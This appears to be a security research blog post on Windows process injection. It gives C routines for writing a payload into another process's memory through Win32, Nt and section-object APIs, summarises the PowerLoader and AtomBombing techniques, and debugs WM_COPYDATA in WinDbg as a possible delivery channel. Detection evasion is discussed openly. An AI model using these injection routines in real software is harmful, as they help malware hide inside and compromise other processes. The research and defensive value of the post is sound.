Introduction
The last post discussed some of the problems when writing a payload for process injection. The purpose of this post is to discuss deploying the payload into the memory space of a target process for execution. One can use conventional Win32 API for this task that some of you will already be familiar with, but there’s also the potential to be creative using unconventional approaches. For example, we can use API to perform read and write operations they weren’t originally intended for, that might help evade detection. There are various ways to deploy and execute a payload, but not all are simple to use. Let’s first focus on the conventional API that despite being relatively easy to detect are still popular among threat actors.
Below is a screenshot of VMMap from sysinternals showing the types of memory allocated for the system I’ll be working on (Windows 10). Some of this memory has the potential to be used for storage of a payload.

Allocating virtual memory
Each process has its own virtual address space. Shared memory exists between processes, but in general, process A should not be able to view the virtual memory of process B without assistance from the Kernel. The Kernel can of course see the virtual memory of all processes because it has to perform virtual to physical memory translation. Process A can allocate new virtual memory in the address space of process B using Virtual Memory API that is then handled internally by the Kernel. Some of you may be familiar with the following steps to deploy a payload in virtual memory of another process.
- Open a target process using OpenProcess or NtOpenProcess.
- Allocate eXecute-Read-Write (XRW) memory in a target process using VirtualAllocEx or NtAllocateVirtualMemory.
- Copy a payload to the new memory using WriteProcessMemory or NtWriteVirtualMemory.
- Execute payload.
- De-allocate XRW memory in target process using VirtualFreeEx or NtFreeVirtualMemory.
- Close target process handle with CloseHandle or NtClose.
Using the Win32 API. This only shows the allocation of XRW memory and writing the payload to new memory.
PVOID CopyPayload1(HANDLE hp, LPVOID payload, ULONG payloadSize){ LPVOID ptr=NULL; SIZE_T tmp; // 1. allocate memory ptr = VirtualAllocEx(hp, NULL, payloadSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); // 2. write payload WriteProcessMemory(hp, ptr, payload, payloadSize, &tmp); return ptr; }
Alternatively using the Nt/Zw API.
LPVOID CopyPayload2(HANDLE hp, LPVOID payload, ULONG payloadSize){ LPVOID ptr=NULL; ULONG len=payloadSize; NTSTATUS nt; ULONG tmp; // 1. allocate memory NtAllocateVirtualMemory(hp, &ptr, 0, &len, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE|PAGE_READWRITE); // 2. write payload NtWriteVirtualMemory(hp, ptr, payload, payloadSize, &tmp); return ptr; }
Although not shown here, an additional operation to remove Write permissions of the virtual memory might be used.
Create a section object
Another way is using section objects. What does Microsoft say about them?
A section object represents a section of memory that can be shared. A process can use a section object to share parts of its memory address space (memory sections) with other processes. Section objects also provide the mechanism by which a process can map a file into its memory address space.
Although the use of these API in a regular application is an indication of something malicious, threat actors will continue to use them for process injection.
- Create a new section object using NtCreateSection and assign to S.
- Map a view of S for attacking process using NtMapViewOfSection and assign to B1.
- Map a view of S for target process using NtMapViewOfSection and assign to B2.
- Copy a payload to B1.
- Unmap B1.
- Close S
- Return pointer to B2.
LPVOID CopyPayload3(HANDLE hp, LPVOID payload, ULONG payloadSize){ HANDLE s; LPVOID ba1=NULL, ba2=NULL; ULONG vs=0; LARGE_INTEGER li; li.HighPart = 0; li.LowPart = payloadSize; // 1. create a new section NtCreateSection(&s, SECTION_ALL_ACCESS, NULL, &li, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL); // 2. map view of section for current process NtMapViewOfSection(s, GetCurrentProcess(), &ba1, 0, 0, 0, &vs, ViewShare, 0, PAGE_EXECUTE_READWRITE); // 3. map view of section for target process NtMapViewOfSection(s, hp, &ba2, 0, 0, 0, &vs, ViewShare, 0, PAGE_EXECUTE_READWRITE); // 4. copy payload to section of memory memcpy(ba1, payload, payloadSize); // 5. unmap memory in the current process ZwUnmapViewOfSection(GetCurrentProcess(), ba1); // 6. close section ZwClose(s); // 7. return pointer to payload in target process space return (PBYTE)ba2; }
Using an existing section object and ROP chain
The Powerloader malware used existing shared objects created by explorer.exe to store a payload, but due to permissions of the object (Read-Write) could not directly execute the code without the use of a Return Oriented Programming (ROP) chain. It’s possible to copy a payload to the memory, but not to execute it without some additional trickery.
The following section names were used by PowerLoader for code injection.
"\BaseNamedObjects\ShimSharedMemory" "\BaseNamedObjects\windows_shell_global_counters" "\BaseNamedObjects\MSCTF.Shared.SFM.MIH" "\BaseNamedObjects\MSCTF.Shared.SFM.AMF" "\BaseNamedObjects\UrlZonesSM_Administrator" "\BaseNamedObjects\UrlZonesSM_SYSTEM"
- Open existing section of memory in target process using NtOpenSection
- Map view of section using NtMapViewOfSection
- Copy payload to memory
- Use a ROP chain to execute
UI Shared Memory
enSilo demonstrated with PowerLoaderEx using UI shared memory for process execution. Injection on Steroids: Codeless code injection and 0-day techniques provides more details of how it works. It uses the desktop heap for injecting the payload into explorer.exe.
Reading a Desktop Heap Overview over at MSDN, we can see there’s already shared memory between processes for the User Interface.
Every desktop object has a single desktop heap associated with it. The desktop heap stores certain user interface objects, such as windows, menus, and hooks. When an application requires a user interface object, functions within user32.dll are called to allocate those objects. If an application does not depend on user32.dll, it does not consume desktop heap.
Using a code cave
Host Intrusion Prevention Systems (HIPS) will regard the use of VirtualAllocEx/WriteProcessMemory as suspicious activity, and this is likely why the authors of PowerLoader used existing section objects. PowerLoader likely inspired the authors behind AtomBombing to use a code cave in a Dynamic-link Library (DLL) for storing a payload and using a ROP chain for execution.
AtomBombing uses a combination of GlobalAddAtom, GlobalGetAtomName and NtQueueApcThread to deploy a payload into a target process. The execution is accomplished using a ROP chain and SetThreadContext. What other ways could one deploy a payload without using the standard approach?
Interprocess Communication (IPC) can be used to share data with another process. Some of the ways this can be achieved include:
- Clipboard (WM_PASTE)
- Data Copy (WM_COPYDATA)
- Named pipes
- Component Object Model (COM)
- Remote Procedure Call (RPC)
- Dynamic Data Exchange (DDE)
For the purpose of this post, I decided to examine WM_COPYDATA, but in hindsight, I think COM might be a better line of enquiry.
Data can be legitimately shared between GUI processes via the WM_COPYDATA message, but can it be used for process injection?. SendMessage and PostMessage are two such APIs that can be used to write data into a remote process space without explicitly opening the target process and copying data there using Virtual Memory API.
Kernel Attacks through User-Mode Callbacks presented at Blackhat 2011 by Tarjei Mandt, lead me to examine the potential for using the KernelCallbackTable located in the Process Environment Block (PEB) for process injection. This field is initialized to an array of functions when user32.dll is loaded into a GUI process and this is where I initially started looking after learning how window messages are dispatched by the kernel.
With WinDbg attached to notepad, obtain the address of the PEB.
0:001> !peb !peb PEB at 0000009832e49000
Dumping this in the windows debugger shows the following details. What we’re interested in here is the KernelCallbackTable, so I’ve stripped out most of the fields.
0:001> dt !_PEB 0000009832e49000 ntdll!_PEB +0x000 InheritedAddressSpace : 0 '' +0x001 ReadImageFileExecOptions : 0 '' +0x002 BeingDebugged : 0x1 '' // details stripped out +0x050 ReservedBits0 : 0y0000000000000000000000000 (0) +0x054 Padding1 : [4] "" +0x058 KernelCallbackTable : 0x00007ffd6afc3070 Void +0x058 UserSharedInfoPtr : 0x00007ffd6afc3070 Void
If we dump the address 0x00007ffd6afc3070 using the dump symbol command, we see a reference to USER32!apfnDispatch.
0:001> dps $peb+58 0000009832e49058 00007ffd6afc3070 USER32!apfnDispatch 0000009832e49060 0000000000000000 0000009832e49068 0000029258490000 0000009832e49070 0000000000000000 0000009832e49078 00007ffd6c0fc2e0 ntdll!TlsBitMap 0000009832e49080 000003ffffffffff 0000009832e49088 00007df45c6a0000 0000009832e49090 0000000000000000 0000009832e49098 00007df45c6a0730 0000009832e490a0 00007df55e7d0000 0000009832e490a8 00007df55e7e0228 0000009832e490b0 00007df55e7f0650 0000009832e490b8 0000000000000001 0000009832e490c0 ffffe86d079b8000 0000009832e490c8 0000000000100000 0000009832e490d0 0000000000002000
Closer inspection of USER32!apfnDispatch reveals an array of functions.
0:001> dps USER32!apfnDispatch 00007ffd6afc3070 00007ffd6af62bd0 USER32!_fnCOPYDATA 00007ffd6afc3078 00007ffd6afbae70 USER32!_fnCOPYGLOBALDATA 00007ffd6afc3080 00007ffd6af60420 USER32!_fnDWORD 00007ffd6afc3088 00007ffd6af65680 USER32!_fnNCDESTROY 00007ffd6afc3090 00007ffd6af696a0 USER32!_fnDWORDOPTINLPMSG 00007ffd6afc3098 00007ffd6afbb4a0 USER32!_fnINOUTDRAG 00007ffd6afc30a0 00007ffd6af65d40 USER32!_fnGETTEXTLENGTHS 00007ffd6afc30a8 00007ffd6afbb220 USER32!_fnINCNTOUTSTRING 00007ffd6afc30b0 00007ffd6afbb750 USER32!_fnINCNTOUTSTRINGNULL 00007ffd6afc30b8 00007ffd6af675c0 USER32!_fnINLPCOMPAREITEMSTRUCT 00007ffd6afc30c0 00007ffd6af641f0 USER32!__fnINLPCREATESTRUCT 00007ffd6afc30c8 00007ffd6afbb2e0 USER32!_fnINLPDELETEITEMSTRUCT 00007ffd6afc30d0 00007ffd6af6bc00 USER32!__fnINLPDRAWITEMSTRUCT 00007ffd6afc30d8 00007ffd6afbb330 USER32!_fnINLPHELPINFOSTRUCT 00007ffd6afc30e0 00007ffd6afbb330 USER32!_fnINLPHELPINFOSTRUCT 00007ffd6afc30e8 00007ffd6afbb430 USER32!_fnINLPMDICREATESTRUCT
The first function, USER32!_fnCOPYDATA, is called when process A sends the WM_COPYDATA message to a window belonging to process B. The kernel will dispatch the message, including other parameters to the target window handle, that will be handled by the windows procedure associated with it.
0:001> u USER32!_fnCOPYDATA USER32!_fnCOPYDATA: 00007ffd6af62bd0 4883ec58 sub rsp,58h 00007ffd6af62bd4 33c0 xor eax,eax 00007ffd6af62bd6 4c8bd1 mov r10,rcx 00007ffd6af62bd9 89442438 mov dword ptr [rsp+38h],eax 00007ffd6af62bdd 4889442440 mov qword ptr [rsp+40h],rax 00007ffd6af62be2 394108 cmp dword ptr [rcx+8],eax 00007ffd6af62be5 740b je USER32!_fnCOPYDATA+0x22 (00007ffd6af62bf2) 00007ffd6af62be7 48394120 cmp qword ptr [rcx+20h],rax
Set a breakpoint on this function and continue execution.
0:001> bp USER32!_fnCOPYDATA 0:001> g
The following piece of code will send the WM_COPYDATA message to notepad. Compile and run it.
int main(void){ COPYDATASTRUCT cds; HWND hw; WCHAR msg[]=L"I don't know what to say!\n"; hw = FindWindowEx(0,0,L"Notepad",0); if(hw!=NULL){ cds.dwData = 1; cds.cbData = lstrlen(msg)*2; cds.lpData = msg; // copy data to notepad memory space SendMessage(hw, WM_COPYDATA, (WPARAM)hw, (LPARAM)&cds); } return 0; }
Once this code executes, it will attempt to find the window handle of Notepad before sending it the WM_COPYDATA message, and this will trigger our breakpoint in the debugger. The call stack shows where the call originated from, in this case it’s from KiUserCallbackDispatcherContinue. Based on the calling convention, the arguments are placed in RCX, RDX, R8 and R9.
Breakpoint 0 hit USER32!_fnCOPYDATA: 00007ffd6af62bd0 4883ec58 sub rsp,58h 0:000> k # Child-SP RetAddr Call Site 00 0000009832caf618 00007ffd6c03dbc4 USER32!_fnCOPYDATA 01 0000009832caf620 00007ffd688d1144 ntdll!KiUserCallbackDispatcherContinue 02 0000009832caf728 00007ffd6af61b0b win32u!NtUserGetMessage+0x14 03 0000009832caf730 00007ff79cc13bed USER32!GetMessageW+0x2b 04 0000009832caf790 00007ff79cc29333 notepad!WinMain+0x291 05 0000009832caf890 00007ffd6bb23034 notepad!__mainCRTStartup+0x19f 06 0000009832caf950 00007ffd6c011431 KERNEL32!BaseThreadInitThunk+0x14 07 0000009832caf980 0000000000000000 ntdll!RtlUserThreadStart+0x21 0:000> r rax=00007ffd6af62bd0 rbx=0000000000000000 rcx=0000009832caf678 rdx=00000000000000b0 rsi=0000000000000000 rdi=0000000000000000 rip=00007ffd6af62bd0 rsp=0000009832caf618 rbp=0000009832caf829 r8=0000000000000000 r9=00007ffd6afc3070 r10=0000000000000000 r11=0000000000000244 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 USER32!_fnCOPYDATA: 00007ffd6af62bd0 4883ec58 sub rsp,58h
Dumping the contents of first parameter in the RCX register shows some recognizable data sent by the example program. notepad!NPWndProc is obviously the callback procedure associated with the target window receiving WM_COPYDATA.
0:000> dps rcx 0000009832caf678 00000038000000b0 0000009832caf680 0000000000000001 0000009832caf688 0000000000000000 0000009832caf690 0000000000000070 0000009832caf698 0000000000000000 0000009832caf6a0 0000029258bbc070 0000009832caf6a8 000000000000004a // WM_COPYDATA 0000009832caf6b0 00000000000c072e 0000009832caf6b8 0000000000000001 0000009832caf6c0 0000000000000001 0000009832caf6c8 0000000000000034 0000009832caf6d0 0000000000000078 0000009832caf6d8 00007ff79cc131b0 notepad!NPWndProc 0000009832caf6e0 00007ffd6c039da0 ntdll!NtdllDispatchMessage_W 0000009832caf6e8 0000000000000058 0000009832caf6f0 006f006400200049
The structure passed to fnCOPYDATA isn’t part of the debugging symbols, but here’s what we’re looking at.
typedef struct _CAPTUREBUF { DWORD cbCallback; DWORD cbCapture; DWORD cCapturedPointers; PBYTE pbFree; DWORD offPointers; PVOID pvVirtualAddress; } CAPTUREBUF, *PCAPTUREBUF; typedef struct _FNCOPYDATAMSG { CAPTUREBUF CaptureBuf; PWND pwnd; UINT msg; HWND hwndFrom; BOOL fDataPresent; COPYDATASTRUCT cds; ULONG_PTR xParam; PROC xpfnProc; } FNCOPYDATAMSG;
Continue to single-step (t) through the code and examine the contents of the registers.
0:000> r r rax=00007ffd6c039da0 rbx=0000000000000000 rcx=00007ff79cc131b0 rdx=000000000000004a rsi=0000000000000000 rdi=0000000000000000 rip=00007ffd6af62c16 rsp=0000009832caf5c0 rbp=0000009832caf829 r8=00000000000c072e r9=0000009832caf6c0 r10=0000009832caf678 r11=0000000000000244 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 USER32!_fnCOPYDATA+0x46: 00007ffd6af62c16 498b4a28 mov rcx,qword ptr [r10+28h] ds:0000009832caf6a0=0000029258bbc070 0:000> u rcx notepad!NPWndProc: 00007ff79cc131b0 4055 push rbp 00007ff79cc131b2 53 push rbx 00007ff79cc131b3 56 push rsi 00007ff79cc131b4 57 push rdi 00007ff79cc131b5 4154 push r12 00007ff79cc131b7 4155 push r13 00007ff79cc131b9 4156 push r14 00007ff79cc131bb 4157 push r15
We see a pointer to COPYDATASTRUCT is placed in r9.
0:000> dps r9 0000009832caf6c0 0000000000000001 0000009832caf6c8 0000000000000034 0000009832caf6d0 0000009832caf6f0 0000009832caf6d8 00007ff79cc131b0 notepad!NPWndProc 0000009832caf6e0 00007ffd6c039da0 ntdll!NtdllDispatchMessage_W 0000009832caf6e8 0000000000000058 0000009832caf6f0 006f006400200049 0000009832caf6f8 002000740027006e 0000009832caf700 0077006f006e006b 0000009832caf708 0061006800770020 0000009832caf710 006f007400200074 0000009832caf718 0079006100730020 0000009832caf720 00000000000a0021 0000009832caf728 00007ffd6af61b0b USER32!GetMessageW+0x2b 0000009832caf730 0000009800000000 0000009832caf738 0000000000000001
This structure is defined in the debugging symbols, so we can dump it showing the values it contains.
0:000> dt uxtheme!COPYDATASTRUCT 0000009832caf6c0 +0x000 dwData : 1 +0x008 cbData : 0x34 +0x010 lpData : 0x0000009832caf6f0 Void
Finally, examine the lpData field that should contain the string we sent from process A.
0:000> du poi(0000009832caf6c0+10) 0000009832caf6f0 "I don't know what to say!."
We can see this address belongs to the stack allocated when thread was created.
0:000> !address 0000009832caf6f0 Usage: Stack Base Address: 0000009832c9f000 End Address: 0000009832cb0000 Region Size: 0000000000011000 ( 68.000 kB) State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE Type: 00020000 MEM_PRIVATE Allocation Base: 0000009832c30000 Allocation Protect: 00000004 PAGE_READWRITE More info: ~0k
Examining the Thread Information Block (TIB) that is located in the Thread Environment Block (TEB) provides us with the StackBase and StackLimit.
0:001> dx -r1 (*((uxtheme!_NT_TIB *)0x9832e4a000)) (*((uxtheme!_NT_TIB *)0x9832e4a000)) [Type: _NT_TIB] [+0x000] ExceptionList : 0x0 [Type: _EXCEPTION_REGISTRATION_RECORD *] [+0x008] StackBase : 0x9832cb0000 [Type: void *] [+0x010] StackLimit : 0x9832c9f000 [Type: void *] [+0x018] SubSystemTib : 0x0 [Type: void *] [+0x020] FiberData : 0x1e00 [Type: void *] [+0x020] Version : 0x1e00 [Type: unsigned long] [+0x028] ArbitraryUserPointer : 0x0 [Type: void *] [+0x030] Self : 0x9832e4a000 [Type: _NT_TIB *]
OK, we can use WM_COPYDATA to deploy a payload into a target process IF it has a GUI attached to it, but it’s not useful unless we can execute it. Moreover, the stack is a volatile area of memory and therefore unreliable to use as a code cave. To execute it would require locating the exact address and using a ROP chain. By the time the ROP chain is executed, there’s no guarantee the payload will still be intact. So, we probably can’t use WM_COPYDATA on this occasion, but it’s worth remembering there are likely many ways of sharing a payload with another process using legitimate API that are less suspicious than using WriteProcessMemory or NtWriteVirtualMemory.
In the case of WM_COPYDATA, one would still need to determine the exact address in stack of payload. Contents of the Thread Environment Block (TEB) can be retrieved via the NtQueryThreadInformation API using the ThreadBasicInformation class. After reading the TebAddress, the StackLimit and StackBase values can be read. In any case, the volatility of the stack means the payload would likely be overwritten before being executed.
Summary
Avoiding the conventional API used to deploy and execute a payload all increase the difficulty of detection. PowerLoader used a code cave in existing section object and a ROP chain for execution. PowerLoaderEx, which is a PoC used the desktop heap, while the AtomBombing PoC uses a code cave in .data section of a DLL.